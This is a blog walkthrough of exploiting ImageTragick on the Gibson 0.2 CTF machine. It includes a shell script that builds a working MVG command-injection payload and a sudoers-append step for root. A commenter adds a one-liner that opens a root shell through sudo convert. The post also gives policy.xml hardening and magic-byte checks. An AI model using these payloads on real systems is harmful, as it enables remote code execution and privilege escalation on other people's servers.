Due to the way ImageMagick hands certain inputs to external delegate programs through the shell, it is possible to inject shell commands into the command it runs. If a web server uses ImageMagick to process images that users upload, that becomes remote code execution: a malicious attacker can craft a file that calls back to a shell when the web server processes it with ImageMagick.

Please refer to the Openwall post, which does a great job of explaining the technical details of why and how the vulnerability works. For this post, I'll give a quick example of how it could be used to gain root on Gibson: 0.2. My hope is that this example helps you replicate ImageTragick in your future CTF/pen testing endeavors.

This is not the only way to take advantage of the vulnerability, but below is how the command is structured for this example use of ImageTragick.

The first thing you should understand is that the commands run by this exploit execute with the privileges of the user who invoked ImageMagick. For example, in Gibson 0.2, margo is a user we were able to SSH in as on our target machine, which is vulnerable to ImageTragick.

Running id shows that margo is a non-root user.

margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

This time, let's run id through convert. The output still names margo, meaning the injected command ran as margo and we are still limited to margo's permission level.

Running convert through sudo changes that: the injected command now executes as root, so you can run any command with root privileges. Knowing this, you can simply give margo full sudo privileges by echoing margo ALL=(ALL:ALL) ALL into /etc/sudoers. Append rather than overwrite, and get the line exactly right, because a malformed sudoers file locks everyone out of sudo; after that, sudo -s as margo gives a root shell.
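The steps above, as an added example that is not code from the original post: a small POSIX shell script that writes the MVG payload the exploit relies on, checks that the breakout quote is present, and optionally feeds the file to convert. The delegate command quoted in the comments is the classic wget one ImageMagick shipped at the time; the host 127.0.0.1 (never actually reached), the paths under /tmp and the environment variable IMAGETRAGICK_RUN are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not code from the original post: build the MVG payload that
# ImageTragick (CVE-2016-3714) relies on and, optionally, hand it to convert.
# Assumptions for illustration: the https delegate is the classic one that
# ImageMagick shipped at the time ("wget" -q -O "%o" "https:%M"), the host
# 127.0.0.1 is a dummy that is never reached, and the /tmp paths are arbitrary.

# make_payload OUT CMD LOGFILE
# Writes an MVG file whose fill URL closes the delegate's quoted URL early,
# so that after substitution the shell runs:
#   "wget" -q -O "/tmp/magick-..." "https://127.0.0.1/image.jpg"|CMD|tee "LOGFILE"
# CMD therefore runs with the privileges of whoever invoked convert.
make_payload() {
    out="$1"; cmd="$2"; logfile="$3"
    cat > "$out" <<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$cmd|tee "$logfile)'
pop graphic-context
EOF
}

# payload_is_well_formed FILE -> 0 if the breakout quote is present.
# Without the double quote right after the URL nothing is injected.
payload_is_well_formed() {
    grep -q '^push graphic-context$' "$1" &&
    grep -q 'fill .url(https://[^"]*"|' "$1" &&
    grep -q '^pop graphic-context$' "$1"
}

# run_payload MVG LOGFILE
# Processes the file with convert as the current user and shows what the
# injected command captured. On a patched ImageMagick (or one whose
# policy.xml denies MVG/HTTPS) convert fails and the log file stays empty.
run_payload() {
    mvg="$1"; logfile="$2"
    rm -f "$logfile"
    if ! command -v convert >/dev/null 2>&1; then
        echo "convert is not installed; payload left at $mvg" >&2
        return 1
    fi
    convert "$mvg" /tmp/imagetragick.png >/dev/null 2>&1 || true
    if [ -s "$logfile" ]; then
        echo "injected command ran; it reported:"
        cat "$logfile"
    else
        echo "nothing captured: ImageMagick is patched or its policy blocks the payload"
        return 1
    fi
}

# Build the payload with the post's own check, id, as the injected command.
make_payload /tmp/imagetragick.mvg id /tmp/imagetragick.out
if payload_is_well_formed /tmp/imagetragick.mvg; then
    echo "payload written to /tmp/imagetragick.mvg"
fi
# Processing it is opt-in (IMAGETRAGICK_RUN=1). Same file, same command, but
# `sudo convert /tmp/imagetragick.mvg out.png` would run id as root instead.
if [ "${IMAGETRAGICK_RUN:-0}" = 1 ]; then
    run_payload /tmp/imagetragick.mvg /tmp/imagetragick.out
fi
```

Run as margo, the captured file holds margo's id output; run through sudo convert, the same file runs the injected command as root, which is all the sudoers step above needs. The exact text after the closing double quote depends on the https delegate line in the target's delegates.xml, so check that file when a separator such as | does not behave as expected.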

I encourage you to read up on other ways ImageTragick can be used and, if you employ ImageMagick on your web servers, how to mitigate it: at a minimum, update ImageMagick, deny the EPHEMERAL, URL, HTTPS, MVG and MSL coders in policy.xml, and verify the magic bytes of uploaded files before they reach ImageMagick, since it picks the coder from the file's content rather than its extension. There is a whole site dedicated to it, creatively named https://imagetragick.com/.
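The mitigation side, as an added example that is not code from the original post or from the ImageMagick project: a POSIX shell script that writes the policy.xml hardening imagetragick.com recommends and implements the magic-byte check that goes with it, with small functions so both can be verified. The scratch paths under /tmp are assumptions; the real policy file lives under the CONFIGURE_PATH reported by `convert -list configure` (commonly /etc/ImageMagick-6/policy.xml).

```shell
#!/bin/sh
# Added example, not code from the original post or from the ImageMagick project:
# the policy.xml hardening that imagetragick.com recommends, plus the magic-byte
# check it pairs with, written as functions so both can be verified.
# Assumption: the /tmp paths below are scratch locations for illustration; the
# real policy path is the CONFIGURE_PATH shown by `convert -list configure`.

# write_policy FILE
# Denies the coders the exploit chain needs (EPHEMERAL, URL, HTTPS, MVG, MSL)
# and the others imagetragick.com lists (TEXT, SHOW, WIN, PLT). An input that
# resolves to one of these coders is rejected before any delegate is run.
write_policy() {
    cat > "$1" <<'EOF'
<policymap>
  <!-- ImageTragick hardening: refuse the coders that reach delegates or files -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
EOF
}

# policy_denies FILE CODER -> 0 if FILE contains a rights="none" rule for CODER
policy_denies() {
    grep -q "domain=\"coder\" rights=\"none\" pattern=\"$2\"" "$1"
}

# has_image_magic FILE -> 0 if the first bytes carry a PNG, JPEG or GIF signature.
# ImageMagick chooses the coder from content, not the extension, so an MVG
# payload named evil.png is still parsed as MVG unless the bytes are checked.
has_image_magic() {
    sig=$(od -An -N4 -tx1 "$1" | tr -d ' \n')
    case "$sig" in
        89504e47) return 0 ;;   # PNG: \x89 P N G
        ffd8ff*)  return 0 ;;   # JPEG: SOI marker
        47494638) return 0 ;;   # GIF: "GIF8"
    esac
    return 1
}

# Write the policy to a scratch location and show both checks in action.
write_policy /tmp/imagetragick-policy.xml
for coder in MVG HTTPS URL EPHEMERAL MSL; do
    policy_denies /tmp/imagetragick-policy.xml "$coder" && echo "policy denies $coder"
done
# A constructed upload: MVG text with a .png name, exactly what the exploit sends.
printf 'push graphic-context\nviewbox 0 0 640 480\n' > /tmp/looks-like-png.png
has_image_magic /tmp/looks-like-png.png || echo "rejected: /tmp/looks-like-png.png is not a real image"
```

After installing the policy, `identify -list policy` prints the merged policy ImageMagick is actually using, which is the check worth running on the server rather than trusting the file on disk. The magic-byte check belongs in the upload handler, before the file name or content ever reaches convert.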

I hope this helps with your future projects. Leave a comment below if you have any questions or inputs.

2 thoughts on “ImageTragick Exploit Example”

I found that the pipe | did not work, but by replacing it with a semicolon ; I was able to run "sudo convert 'https:\\"; /bin/bash"' null.png". This dropped me straight to root. Cheers, thanks for the write-up.